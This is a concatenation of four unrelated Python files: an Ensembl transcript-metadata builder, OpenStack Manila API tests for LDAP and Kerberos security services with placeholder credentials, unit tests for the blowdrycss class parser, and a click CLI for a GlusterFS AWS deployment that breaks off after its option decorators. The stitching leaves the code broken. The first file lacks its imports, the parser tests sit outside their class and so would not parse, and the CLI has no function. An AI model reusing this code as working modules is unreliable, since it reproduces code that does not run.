def short_hash(s, n=4):
    """Return the first *n* characters of the urlsafe-base64 SHA-1 digest of *s*.

    Accepts bytes or text; text is UTF-8 encoded first, so the function
    works under both Python 2 and Python 3 (``hashlib.sha1`` rejects
    ``str`` on Python 3).
    """
    if not isinstance(s, bytes):
        s = s.encode("utf-8")
    return base64.urlsafe_b64encode(hashlib.sha1(s).digest())[:n]
def versioned_filename(base, deps, ext):
    """
    Create a unique filename based on some URL dependencies
    by adding a subset of each URL's hash to a base name.

    Example: versioned_filename("meta", [url1, url2], "tsv")
    -> "meta_<h1>_<h2>.tsv" where h1/h2 are short hashes of the URLs.
    """
    parts = [base]
    for dep in deps:
        h = short_hash(dep)
        # On Python 3 base64 returns bytes; decode so str concatenation works.
        if not isinstance(h, str):
            h = h.decode("ascii")
        parts.append(h)
    return "_".join(parts) + "." + ext
def download_transcript_metadata(filter_contigs=STANDARD_CONTIGS):
    """Build (and cache) a flat per-exon transcript metadata TSV from the
    Ensembl release-75 MySQL dump files.

    Joins the gene, seq_region, transcript, translation, exon and
    exon_transcript tables into one table with one row per
    (exon, transcript) pair.

    Parameters
    ----------
    filter_contigs : set or falsy
        Keep only sequence regions whose name is in this set (defaults to
        the standard chromosomes); pass a falsy value to disable filtering.

    Returns
    -------
    str
        Full path of the cached TSV file.
    """
    # The output name embeds a short hash of every source URL, so changing
    # any upstream URL invalidates the cache automatically.
    output_filename = versioned_filename(
        "transcript_metadata",
        deps=[
            GENE_DATA_URL,
            SEQ_REGION_DATA_URL,
            EXON_DATA_URL,
            TRANSCRIPT_DATA_URL,
            TRANSLATION_DATA_URL],
        ext="tsv")
    full_path = build_path(output_filename, subdir="immuno")
    logging.info("Transcript metadata path %s", full_path)
    if not exists(full_path):
        GENE_DATA_PATH = fetch_file(GENE_DATA_URL)
        SEQ_REGION_DATA_PATH = fetch_file(SEQ_REGION_DATA_URL)
        EXON_DATA_PATH = fetch_file(EXON_DATA_URL)
        TRANSCRIPT_DATA_PATH = fetch_file(TRANSCRIPT_DATA_URL)
        TRANSLATION_DATA_PATH = fetch_file(TRANSLATION_DATA_URL)
        EXON_TRANSCRIPT_DATA_PATH = fetch_file(EXON_TRANSCRIPT_DATA_URL)
        seqregion = pd.read_csv(
            SEQ_REGION_DATA_PATH,
            sep='\t',
            names=SEQ_REGION_HEADER,
            index_col=False)

        def in_filter_contigs(x):
            return x in filter_contigs

        # Drop non-standard contigs (patches, haplotypes, ...) up front so
        # every downstream merge shrinks accordingly.
        if filter_contigs:
            seqregion = seqregion[seqregion['name'].map(in_filter_contigs)]
        # TODO: Ask Arun what's going on here, leave a good explanation
        gene = pd.read_csv(
            GENE_DATA_PATH,
            sep='\t',
            names=GENE_HEADER,
            index_col=False)
        # Attach contig names to genes via the seq_region table.
        seqregion_gene = gene.merge(seqregion, on='seq_region_id')
        transcript = pd.read_csv(
            TRANSCRIPT_DATA_PATH, sep='\t',
            names=TRANSCRIPT_HEADER,
            index_col=False)
        translation = pd.read_csv(
            TRANSLATION_DATA_PATH, sep='\t',
            names=TRANSLATION_HEADER,
            index_col=False)
        # Inner-join drops transcripts without a translation (non-coding).
        transcript = transcript.merge(
            translation,
            on='transcript_id',
            suffixes=['', '_translation'])
        gene_transcript = transcript.merge(
            seqregion_gene,
            on='gene_id',
            suffixes=['', '_gene'])
        exon = pd.read_csv(
            EXON_DATA_PATH,
            sep='\t',
            names=EXON_HEADER,
            index_col=False)
        exon_transcript = pd.read_csv(
            EXON_TRANSCRIPT_DATA_PATH,
            sep='\t',
            names=['exon_id', 'transcript_id', 'rank'])
        exon_w_exon_transcript = pd.merge(
            exon,
            exon_transcript,
            on='exon_id',
            suffixes=('_exon', '_et'))
        exon_w_transcript = pd.merge(
            exon_w_exon_transcript,
            gene_transcript,
            on='transcript_id',
            suffixes=('_exon', '_transcript'))
        # Fixed: this was a Python-2-only `print` statement; the function
        # form behaves the same on both Python 2 and 3.
        print(exon_w_transcript.columns)
        exon_cols = [
            'name',
            'stable_id_gene',
            'description_gene',
            'seq_region_start_gene',
            'seq_region_end_gene',
            'seq_region_strand_gene',
            'stable_id_transcript',
            'seq_region_start_transcript',
            'seq_region_end_transcript',
            'seq_start',
            'start_exon_id',
            'seq_end',
            'end_exon_id',
            'stable_id_translation',
            'stable_id_exon',
            'exon_id',
            'rank',
            'phase',
            'seq_region_start_exon',
            'seq_region_end_exon']
        exon_data = exon_w_transcript[exon_cols]
        exon_data.to_csv(full_path, index=False, sep='\t')
    return full_path
|
|
# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
import six
from tempest import config
import testtools
from testtools import testcase as tc
from manila_tempest_tests.tests.api import base
CONF = config.CONF
LOG = log.getLogger(__name__)
class SecurityServiceListMixin(object):
    """List-view test cases shared by security-service test classes.

    Expects the concrete test class to provide ``self.ss_ldap`` and
    ``self.ss_kerberos`` security services plus the usual tempest
    ``shares_client`` fixture.
    """

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_list_security_services(self):
        listed = self.shares_client.list_security_services()
        self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
        self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
                            for ss in listed))
        # verify keys — plain loops; the previous list comprehensions were
        # used only for their assertion side effects.
        keys = ["name", "id", "status", "type", ]
        for s_s in listed:
            for key in keys:
                self.assertIn(key, s_s.keys())

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_list_security_services_with_detail(self):
        listed = self.shares_client.list_security_services(detailed=True)
        self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
        self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
                            for ss in listed))
        # verify keys
        keys = [
            "name", "id", "status", "description",
            "domain", "server", "dns_ip", "user", "password", "type",
            "created_at", "updated_at", "project_id",
        ]
        for s_s in listed:
            for key in keys:
                self.assertIn(key, s_s.keys())

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    @testtools.skipIf(
        not CONF.share.multitenancy_enabled, "Only for multitenancy.")
    def test_list_security_services_filter_by_share_network(self):
        sn = self.shares_client.get_share_network(
            self.shares_client.share_network_id)
        # Two fresh share networks, each with a different security service,
        # so filtering by network must return exactly one service.
        fresh_sn = []
        for i in range(2):
            sn = self.create_share_network(
                neutron_net_id=sn["neutron_net_id"],
                neutron_subnet_id=sn["neutron_subnet_id"])
            fresh_sn.append(sn)
        self.shares_client.add_sec_service_to_share_network(
            fresh_sn[0]["id"], self.ss_ldap["id"])
        self.shares_client.add_sec_service_to_share_network(
            fresh_sn[1]["id"], self.ss_kerberos["id"])
        listed = self.shares_client.list_security_services(
            params={'share_network_id': fresh_sn[0]['id']})
        self.assertEqual(1, len(listed))
        self.assertEqual(self.ss_ldap['id'], listed[0]['id'])
        keys = ["name", "id", "status", "type", ]
        for s_s in listed:
            for key in keys:
                self.assertIn(key, s_s.keys())

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_list_security_services_detailed_filter_by_ss_attributes(self):
        # Filter on every attribute of the LDAP fixture at once; each
        # returned service must match all of them.
        search_opts = {
            'name': 'ss_ldap',
            'type': 'ldap',
            'user': 'fake_user',
            'server': 'fake_server_1',
            'dns_ip': '1.1.1.1',
            'domain': 'fake_domain_1',
        }
        listed = self.shares_client.list_security_services(
            detailed=True,
            params=search_opts)
        self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
        for ss in listed:
            self.assertTrue(all(ss[key] == value for key, value
                                in search_opts.items()))
class SecurityServicesTest(base.BaseSharesTest,
                           SecurityServiceListMixin):
    # CRUD tests for security services; also provides the ss_ldap /
    # ss_kerberos fixtures the list mixin expects.

    def setUp(self):
        # Create one LDAP and one Kerberos security service per test so
        # the list/filter assertions have known fixtures.
        super(SecurityServicesTest, self).setUp()
        ss_ldap_data = {
            'name': 'ss_ldap',
            'dns_ip': '1.1.1.1',
            'server': 'fake_server_1',
            'domain': 'fake_domain_1',
            'user': 'fake_user',
            'password': 'pass',
        }
        ss_kerberos_data = {
            'name': 'ss_kerberos',
            'dns_ip': '2.2.2.2',
            'server': 'fake_server_2',
            'domain': 'fake_domain_2',
            'user': 'test_user',
            'password': 'word',
        }
        self.ss_ldap = self.create_security_service('ldap', **ss_ldap_data)
        self.ss_kerberos = self.create_security_service(
            'kerberos', **ss_kerberos_data)

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_create_delete_security_service(self):
        data = self.generate_security_service_data()
        # every service type the API supports
        self.service_names = ["ldap", "kerberos", "active_directory"]
        for ss_name in self.service_names:
            ss = self.create_security_service(ss_name, **data)
            self.assertDictContainsSubset(data, ss)
            self.assertEqual(ss_name, ss["type"])
            self.shares_client.delete_security_service(ss["id"])

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_get_security_service(self):
        data = self.generate_security_service_data()
        ss = self.create_security_service(**data)
        self.assertDictContainsSubset(data, ss)
        # GET must return the same data the service was created with
        get = self.shares_client.get_security_service(ss["id"])
        self.assertDictContainsSubset(data, get)

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_update_security_service(self):
        data = self.generate_security_service_data()
        ss = self.create_security_service(**data)
        self.assertDictContainsSubset(data, ss)
        upd_data = self.generate_security_service_data()
        updated = self.shares_client.update_security_service(
            ss["id"], **upd_data)
        # both the update response and a fresh GET must reflect the change
        get = self.shares_client.get_security_service(ss["id"])
        self.assertDictContainsSubset(upd_data, updated)
        self.assertDictContainsSubset(upd_data, get)

    @tc.attr(base.TAG_POSITIVE, base.TAG_API_WITH_BACKEND)
    @testtools.skipIf(
        not CONF.share.multitenancy_enabled, "Only for multitenancy.")
    def test_try_update_valid_keys_sh_server_exists(self):
        # Once a share server uses the security service, only name and
        # description may be updated; verify that path still works.
        ss_data = self.generate_security_service_data()
        ss = self.create_security_service(**ss_data)
        sn = self.shares_client.get_share_network(
            self.shares_client.share_network_id)
        fresh_sn = self.create_share_network(
            neutron_net_id=sn["neutron_net_id"],
            neutron_subnet_id=sn["neutron_subnet_id"])
        self.shares_client.add_sec_service_to_share_network(
            fresh_sn["id"], ss["id"])
        # Security service with fake data is used, so if we use backend driver
        # that fails on wrong data, we expect error here.
        # We require any share that uses our share-network.
        try:
            self.create_share(
                share_network_id=fresh_sn["id"], cleanup_in_class=False)
        except Exception as e:
            # we do wait for either 'error' or 'available' status because
            # it is the only available statuses for proper deletion.
            LOG.warning("Caught exception. It is expected in case backend "
                        "fails having security-service with improper data "
                        "that leads to share-server creation error. "
                        "%s" % six.text_type(e))
        update_data = {
            "name": "name",
            "description": "new_description",
        }
        updated = self.shares_client.update_security_service(
            ss["id"], **update_data)
        self.assertDictContainsSubset(update_data, updated)

    @tc.attr(base.TAG_POSITIVE, base.TAG_API)
    def test_list_security_services_filter_by_invalid_opt(self):
        # Unknown filter keys are ignored by the API, so both fixtures
        # must still appear in the listing.
        listed = self.shares_client.list_security_services(
            params={'fake_opt': 'some_value'})
        self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
        self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
                            for ss in listed))
|
|
# python 2
from __future__ import absolute_import
# builtin
from unittest import TestCase, main
# custom
from blowdrycss.classpropertyparser import ClassPropertyParser
class TestClassPropertyParser(TestCase):
def test_class_set_to_lowercase(self):
    # NOTE(review): the expected literal repeats 'the'; as a set it
    # collapses to {'the', 't2he'} — consider writing it that way.
    original_class_set = {'ThE', 'the', 'THE', 't2HE'}
    expected_class_set = {'the', 'the', 'the', 't2he'}
    class_parser = ClassPropertyParser(class_set=original_class_set)
    class_parser.class_set_to_lowercase()
    self.assertEqual(class_parser.class_set, expected_class_set)

def test_underscores_valid_is_true(self):
    # Underscores appear to encode decimal points in values (e.g. '5_2rem'
    # for 5.2rem) — valid only when flanked by digits.
    valid_classes = {'6_3', 'padding-5_2rem', 'height-24_48p', '1_2-5_75-1_2-5_75', 'n5_25cm', }
    class_parser = ClassPropertyParser(class_set=valid_classes)
    for css_class in class_parser.class_set:
        self.assertTrue(class_parser.underscores_valid(css_class=css_class), msg=css_class)

def test_underscores_valid_is_false(self):
    # Underscores not flanked by digits (or doubled, leading, trailing)
    # must be rejected.
    invalid_classes = {
        '_bold', 'lighter-1_', 'width-_2', 'margin-2_rem', 'height-m_px', 'bg-color__blue',
        '-_2', '2_rem', 'm_px', '__', '_35', '42_', '-7_2', '5_4-', ' _ ', ' _3_2', '8_9_ ', '6_4 _ ',
    }
    class_parser = ClassPropertyParser(class_set=set())
    for css_class in invalid_classes:
        self.assertFalse(class_parser.underscores_valid(css_class=css_class), msg=css_class)
def test_clean_class_set(self):
    # clean_class_set() must keep valid classes, move invalid ones to
    # removed_class_set, and annotate each removal with a reason string.
    valid_classes = {
        'color-hfff', 'font-color-hsla-120-60p-70p-0_3', 'padding-5_2rem', 'height-24_48p',
        'padding-7_3-8_5-9_7-10_2', 'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i',
    }
    # Covers all invalid cases: first char, allowed chars, last char, and underscores.
    invalid_classes = {
        '', ' ', '*b', 'bg-color__blue', 'height-m_px', 'lighter-1$', 'margin-2_rem',
        'padding-@1px-2px-1px-2px', 'width-_2', 'bold-', 'green_', 'font-color-#000',
    }
    expected_removed = {
        ' (May not be None or "".)',
        ' (Only a-z allowed for first character of class.)',
        '*b (Only a-z allowed for first character of class.)',
        'bg-color__blue (Invalid underscore usage in class.)',
        'height-m_px (Invalid underscore usage in class.)',
        'lighter-1$ (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
        'margin-2_rem (Invalid underscore usage in class.)',
        'padding-@1px-2px-1px-2px (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
        'width-_2 (Invalid underscore usage in class.)',
        'bold- (Only a-z and 0-9 allowed for last character of class.)',
        'green_ (Only a-z and 0-9 allowed for last character of class.)',
        'font-color-#000 (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
    }
    class_parser = ClassPropertyParser(class_set=set())  # Prevents the implicit call in __init__()
    class_parser.class_set = valid_classes.union(invalid_classes)  # Mix valid and invalid classes
    class_parser.clean_class_set()
    self.assertEqual(class_parser.class_set, valid_classes)  # Only valid classes should remain.
    # NOTE(review): assertEqual would give a better failure diff here.
    self.assertTrue(class_parser.removed_class_set == expected_removed, msg=expected_removed)
def test_get_property_name_by_identical_name_valid(self):
    # Classes that literally start with a known property name resolve to it.
    valid_identical_set = {'font-weight-bold', 'font-weight-700'}
    expected_property_name = 'font-weight'
    class_parser = ClassPropertyParser(class_set=valid_identical_set)
    class_list = list(class_parser.class_set)
    for i, css_class in enumerate(class_list):
        property_name = class_parser.get_property_name(css_class=css_class)
        self.assertEqual(property_name, expected_property_name)

def test_get_property_name_by_identical_name_invalid(self):
    # Unresolvable classes yield '' and must not be added to class_set.
    invalid_identical_set = [
        'font-weight', 'font-weight-', 'afont-weight-', '-font-weight', 'font%weight', 'fw-', '700'
    ]
    expected_property_name = ''
    expected_empty_set = set()
    class_parser = ClassPropertyParser(class_set=set())
    for css_class in invalid_identical_set:
        property_name = class_parser.get_property_name(css_class=css_class)
        self.assertEqual(property_name, expected_property_name)
        self.assertEqual(class_parser.class_set, expected_empty_set, msg=class_parser.class_set)

def test_get_property_name_by_alias(self):
    # Aliases and abbreviations ('bold', 'fw-', ...) all map to font-weight.
    class_alias_set = {'bold', 'bolder', 'lighter', 'fweight-200', 'f-weight-100', 'fw-bold', 'font-w-900', }
    expected_property_name = 'font-weight'
    class_parser = ClassPropertyParser(class_set=set())
    class_list = list(class_alias_set)
    for css_class in class_list:
        property_name = class_parser.get_property_name(css_class=css_class)
        self.assertEqual(property_name, expected_property_name, msg=css_class)

def test_get_property_name_by_regex(self):
    # Bare hex-encoded values ('h' + hex digits) resolve to 'color'.
    class_alias_set = {'h0e2', 'h2ad', 'h987fcb', 'h15af36', }
    expected_property_name = 'color'
    class_parser = ClassPropertyParser(class_set=set())
    class_list = list(class_alias_set)
    for css_class in class_list:
        property_name = class_parser.get_property_name(css_class=css_class)
        self.assertEqual(property_name, expected_property_name, msg=css_class)

def test_get_property_name_non_matching(self):
    # Completely unknown classes resolve to '' and leave class_set empty.
    non_matching = ['not-a-property-', 'a-font-not-']
    expected_property_name = ''
    expected_empty_set = set()
    class_parser = ClassPropertyParser(class_set=set())
    for css_class in non_matching:
        property_name = class_parser.get_property_name(css_class=css_class)
        self.assertEqual(property_name, expected_property_name)
        self.assertEqual(class_parser.class_set, expected_empty_set)
def test_is_valid_pseudo_format_True(self):
    # Pseudo classes/elements appear as trailing '-<pseudo>' suffixes,
    # optionally combined with the '-i' (important) flag in either order.
    valid_inputs = (
        'color-blue-hover', 'padding-10rem-i-active', 'bgc-h048-visited',
        'color-red-after', 'padding-20rem-i-before', 'bgc-h096-selection',
        'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i', 'color-hfff-i-hover',
    )
    pseudo_items = (
        'hover', 'active', 'visited', 'after', 'before', 'selection',
        'hover', 'hover', 'hover', 'hover',
    )
    class_parser = ClassPropertyParser(class_set=set())
    for i, valid_input in enumerate(valid_inputs):
        self.assertTrue(
            class_parser.is_valid_pseudo_format(pseudo_items[i], valid_input),
            msg=valid_input
        )

def test_is_valid_pseudo_format_False(self):
    # Leading pseudo names, mid-class pseudo names, unknown pseudo items
    # and breakpoint suffixes must all be rejected.
    invalid_inputs = (
        '-hover-blue', 'pa-active-10rem-i', 'bgc-', 'margin-10-medium-up',
        '-after-blue', 'pa-before-10rem-i', 'bgc-', 'width-10-small-up'
    )
    pseudo_items = ('hover', 'active', 'invalid', 'invalid', 'after', 'before', 'invalid', 'invalid')
    class_parser = ClassPropertyParser(class_set=set())
    for i, invalid_input in enumerate(invalid_inputs):
        self.assertFalse(
            class_parser.is_valid_pseudo_format(pseudo_items[i], css_class=invalid_input),
            msg=invalid_input
        )

def test_get_pseudo_class(self):
    # set_pseudo_class() stores the detected pseudo class on the parser.
    valid_inputs = ('color-blue-hover', 'padding-10rem-i-active', 'bgc-h048-visited')
    expected_classes = ('hover', 'active', 'visited', )
    class_parser = ClassPropertyParser(class_set=set())
    for i, valid_input in enumerate(valid_inputs):
        class_parser.set_pseudo_class(css_class=valid_input)
        self.assertEqual(class_parser.pseudo_class, expected_classes[i])

def test_get_pseudo_class_ValueError(self):
    # An empty css_class is rejected.
    class_parser = ClassPropertyParser(class_set=set())
    self.assertRaises(ValueError, class_parser.set_pseudo_class, '')

def test_get_pseudo_element(self):
    # set_pseudo_element() stores the detected pseudo element on the parser.
    valid_inputs = ('color-blue-after', 'padding-10rem-i-before', 'bgc-h048-selection', 'color-hfff-before')
    expected_elements = ('after', 'before', 'selection', 'before')
    class_parser = ClassPropertyParser(class_set=set())
    for i, valid_input in enumerate(valid_inputs):
        class_parser.set_pseudo_element(css_class=valid_input)
        self.assertEqual(class_parser.pseudo_element, expected_elements[i])

def test_get_pseudo_element_ValueError(self):
    # An empty css_class is rejected.
    class_parser = ClassPropertyParser(class_set=set())
    self.assertRaises(ValueError, class_parser.set_pseudo_element, '')
def test_strip_property_name_matching(self):
    # 'font-weight-400' with property name 'font-weight' -> '400'.
    property_name = 'font-weight'
    encoded_property_value = 'font-weight-400'
    expected_encoded_property_value = '400'
    class_parser = ClassPropertyParser(class_set=set())
    encoded_property_value = class_parser.strip_property_name(
        property_name=property_name,
        css_class=encoded_property_value
    )
    self.assertEqual(encoded_property_value, expected_encoded_property_value)

def test_strip_property_name_not_matching(self):
    # A class that does not start with the property name is returned unchanged.
    property_name = 'font-weight'
    encoded_property_value = 'bold'
    css_class = 'bold'
    class_parser = ClassPropertyParser(class_set=set())
    encoded_property_value = class_parser.strip_property_name(
        property_name=property_name,
        css_class=encoded_property_value
    )
    self.assertEqual(encoded_property_value, css_class)

def test_strip_property_name_empty(self):
    # An empty property name is rejected with ValueError.
    empty_property_name = ''
    css_class = 'bold'
    class_parser = ClassPropertyParser(class_set=set())
    self.assertRaises(ValueError, class_parser.strip_property_name, empty_property_name, css_class)

def test_strip_pseudo_item(self):
    # Trailing '-<pseudo>' suffixes are removed from the class.
    pseudo_items = ('hover', 'before', 'selection', )
    css_classes = ('padding-10-i-hover', 'color-hfff-before', 'width-1rem-s-selection', )
    expected = ('padding-10-i', 'color-hfff', 'width-1rem-s', )
    class_parser = ClassPropertyParser(class_set=set())
    for i, pseudo_item in enumerate(pseudo_items):
        actual = class_parser.strip_pseudo_item(css_class=css_classes[i])
        self.assertEqual(expected[i], actual)

def test_strip_pseudo_item_not_matching(self):
    css_class = 'padding-10-i'
    class_parser = ClassPropertyParser(class_set=set())
    result = class_parser.strip_pseudo_item(css_class=css_class)
    self.assertEqual(result, css_class)  # css_class should remain unchanged.

def test_strip_pseudo_item_empty(self):
    # An empty css_class is rejected with ValueError.
    empty_class = ''
    class_parser = ClassPropertyParser(class_set=set())
    self.assertRaises(ValueError, class_parser.strip_pseudo_item, empty_class)

def test_strip_encoded_property_name_valueerror(self):
    # Both arguments must be non-blank strings.
    invalid_inputs = ['', ' ']
    class_parser = ClassPropertyParser(class_set=set())
    for invalid in invalid_inputs:
        self.assertRaises(ValueError, class_parser.strip_property_name, invalid, 'c-lime')
        self.assertRaises(ValueError, class_parser.strip_property_name, 'color', invalid)
def test_alias_is_abbreviation(self):
    # Abbreviations are aliases that end with '-' (a prefix form).
    expected_true = ['fw-', 'p-', 'h-', 'w-']
    expected_false = ['fw', 'p', 'height', 'width']
    class_parser = ClassPropertyParser(class_set=set())
    for _true in expected_true:
        self.assertTrue(class_parser.alias_is_abbreviation(_true), msg=_true)
    for _false in expected_false:
        self.assertFalse(class_parser.alias_is_abbreviation(_false), msg=_false)

def test_get_property_abbreviations(self):
    # All prefix-style aliases for 'font-weight' (order not significant).
    expected_abbreviations = ['fweight-', 'f-weight-', 'fw-', 'font-w-']
    property_name = 'font-weight'
    class_parser = ClassPropertyParser(class_set=set())
    abbreviations = class_parser.get_property_abbreviations(property_name=property_name)
    self.assertEqual(set(abbreviations), set(expected_abbreviations))

def test_get_property_abbreviations_raises_key_error(self):
    # Unknown property names raise KeyError.
    invalid_property_name = 'invalid'
    class_parser = ClassPropertyParser(class_set=set())
    self.assertRaises(KeyError, class_parser.get_property_abbreviations, invalid_property_name)

def test_strip_property_abbreviation_matching(self):
    # 'fw-400' -> '400' once the 'fw-' abbreviation is stripped.
    property_name = 'font-weight'
    css_class = 'fw-400'
    expected_encoded_property_value = '400'
    class_parser = ClassPropertyParser(class_set=set())
    css_class = class_parser.strip_property_abbreviation(
        property_name=property_name,
        css_class=css_class
    )
    self.assertEqual(css_class, expected_encoded_property_value)

def test_strip_property_abbreviation_not_matching(self):
    # Classes without a matching abbreviation prefix are returned unchanged.
    property_name = 'font-weight'
    css_class = 'bold'
    expected_encoded_property_value = 'bold'
    class_parser = ClassPropertyParser(class_set=set())
    css_class = class_parser.strip_property_abbreviation(
        property_name=property_name,
        css_class=css_class
    )
    self.assertEqual(css_class, expected_encoded_property_value)

def test_strip_property_abbreviation_raises_value_error(self):
    # Both arguments must be non-blank strings.
    invalid_inputs = ['', ' ']
    class_parser = ClassPropertyParser(class_set=set())
    for invalid in invalid_inputs:
        self.assertRaises(ValueError, class_parser.strip_property_abbreviation, invalid, 'c-lime')
        self.assertRaises(ValueError, class_parser.strip_property_abbreviation, 'color', invalid)
def test_get_encoded_property_value(self):
    # 'fw-bold-i' --> 'bold' [abbreviated font-weight property_name]
    # 'padding-1-10-10-5-i' --> '1-10-10-5' [standard property_name]
    # 'height-7_25rem-i' --> '7_25rem' [contains underscores]
    property_names = [
        'font-weight', 'padding', 'height', 'width', 'background-color',
        'color', 'color', 'color', 'color',
    ]
    css_classes = [
        'fw-bold-i', 'padding-1-10-10-5-i', 'height-7_25rem-i', 'width-50cm-s-i', 'bgc-red-i-hover',
        'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i', 'color-hfff-i-hover',
    ]
    expected_encoded_property_values = [
        'bold', '1-10-10-5', '7_25rem', '50cm-s', 'red',
        'hfff', 'hfff', 'hfff', 'hfff',
    ]
    class_parser = ClassPropertyParser(class_set=set())
    for i, css_class in enumerate(css_classes):
        encoded_property_value = class_parser.get_encoded_property_value(
            property_name=property_names[i],
            css_class=css_class
        )
        self.assertEqual(encoded_property_value, expected_encoded_property_values[i], msg=encoded_property_value)

def test_get_encoded_property_value_invalid_raise_value_error(self):
    # Both arguments must be non-blank strings.
    invalid_inputs = ['', ' ']
    class_parser = ClassPropertyParser(class_set=set())
    for invalid in invalid_inputs:
        self.assertRaises(ValueError, class_parser.get_encoded_property_value, invalid, 'c-lime')
        self.assertRaises(ValueError, class_parser.get_encoded_property_value, 'color', invalid)

def test_get_property_value_valid_patterns(self):
    # Encoded values decode to real CSS: 'hfff' -> '#fff',
    # 'rgba-255-0-0-0_5' -> 'rgba(255, 0, 0, 0.5)', etc.
    property_name = 'color'
    encoded_property_values = (
        'green', 'h0ff48f', 'hfff', 'rgba-255-0-0-0_5', 'hsla-120-60p-70p-0_3', 'blue', 'hf8f8f8',
    )
    expected_property_values = (
        'green', '#0ff48f', '#fff', 'rgba(255, 0, 0, 0.5)', 'hsla(120, 60%, 70%, 0.3)', 'blue', '#f8f8f8',
    )
    for i, value in enumerate(encoded_property_values):
        css_class = property_name + '-' + value
        class_parser = ClassPropertyParser(class_set={css_class})
        property_value = class_parser.get_property_value(property_name=property_name, encoded_property_value=value)
        self.assertEqual(property_value, expected_property_values[i])
        self.assertEqual(class_parser.class_set, {css_class})

# Invalid CSS patterns that can be returned by this method.
def test_get_property_value_invalid_patterns(self):
    # get_property_value() does not validate: malformed encodings decode
    # to (invalid) strings rather than raising.
    property_name = 'color'
    encoded_property_values = ['bold-50', '5u5', 'b1-a5-c1p-e5', '5pxrem', '1ap-10xp-3qp-1mp3', 'p12px']
    expected_values = ['bold 50', '5u5', 'b1 a5 c1% e5', '5pxrem', '1a% 10x% 3q% 1mp3', 'p12px']
    for i, value in enumerate(encoded_property_values):
        css_class = property_name + '-' + value
        class_parser = ClassPropertyParser(class_set={css_class})
        property_value = class_parser.get_property_value(property_name=property_name, encoded_property_value=value)
        self.assertEqual(property_value, expected_values[i])

def test_get_property_value_invalid_raise_value_error(self):
    # Both arguments must be non-blank strings.
    invalid_inputs = ['', ' ']
    class_parser = ClassPropertyParser(class_set=set())
    for invalid in invalid_inputs:
        self.assertRaises(ValueError, class_parser.get_property_value, invalid, 'c-lime')
        self.assertRaises(ValueError, class_parser.get_property_value, 'color', invalid)
def test_is_important_True(self):
    """Classes carrying the '-i' priority designator are important."""
    parser = ClassPropertyParser(class_set=set())
    important_classes = (
        'p-10-i', 'c-green-i-hover', 'hfff-hover-i', 'hfff-i-hover',
        'color-hfff-hover-i',
    )
    for css_class in important_classes:
        self.assertTrue(parser.is_important(css_class=css_class), msg=css_class)
def test_is_important_False(self):
    """A class without the '-i' designator is not important."""
    parser = ClassPropertyParser(class_set=set())
    self.assertFalse(parser.is_important(css_class='height-50'))
def test_is_important_raise_value_error(self):
    """Empty or whitespace-only class names must raise ValueError."""
    parser = ClassPropertyParser(class_set=set())
    for bad_input in ('', ' '):
        with self.assertRaises(ValueError):
            parser.is_important(bad_input)
def test_strip_priority_designator(self):
    """The '-i' suffix is stripped; unmarked classes pass through."""
    parser = ClassPropertyParser(class_set=set())
    # Both the important and the plain form normalize to 'p-10'.
    for css_class in ('p-10-i', 'p-10'):
        self.assertEqual(
            parser.strip_priority_designator(css_class=css_class), 'p-10')
def test_strip_priority_designator_raise_value_error(self):
    """Empty or whitespace-only class names must raise ValueError."""
    parser = ClassPropertyParser(class_set=set())
    for bad_input in ('', ' '):
        with self.assertRaises(ValueError):
            parser.strip_priority_designator(bad_input)
def test_get_property_priority_important(self):
    """Every '-i'-marked class maps to the priority 'important'."""
    parser = ClassPropertyParser(class_set={
        'font-weight-bold-i', 'font-weight-700-i', 'bold-i',
        'normal-i-hover', 'padding-10-i-after',
        'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i',
    })
    for css_class in parser.class_set:
        self.assertEqual(
            parser.get_property_priority(css_class=css_class), 'important')
def test_get_property_priority_not_important(self):
    """Classes without the '-i' designator map to an empty priority."""
    parser = ClassPropertyParser(class_set={
        'font-weight-bold', 'font-weight-700', 'bold', 'normal-hover',
        'padding-10-after',
    })
    for css_class in parser.class_set:
        self.assertEqual(parser.get_property_priority(css_class=css_class), '')
def test_get_property_priority_raise_value_error(self):
    """Empty or whitespace-only class names must raise ValueError."""
    parser = ClassPropertyParser(class_set=set())
    for bad_input in ('', ' '):
        with self.assertRaises(ValueError):
            parser.get_property_priority(bad_input)
# Run the unittest test runner when this module is executed directly.
if __name__ == '__main__':
    main()
|
|
#!/usr/bin/env python
# vim: sw=2 ts=2
import click
import os
import sys
@click.command()
### AWS/EC2 options
@click.option('--glusterfs-stack-name', help='Specify a gluster stack name. Making the name unique will allow for multiple deployments',
              show_default=True)
@click.option('--region', default='us-east-1', help='ec2 region',
              show_default=True)
@click.option('--ami', default='ami-fbc89880', help='ec2 ami',
              show_default=True)
@click.option('--node-instance-type', default='m4.2xlarge', help='ec2 instance type',
              show_default=True)
@click.option('--use-cloudformation-facts', is_flag=True, help='Use cloudformation to populate facts. Requires Deployment >= OCP 3.5',
              show_default=True)
@click.option('--keypair', help='ec2 keypair name',
              show_default=True)
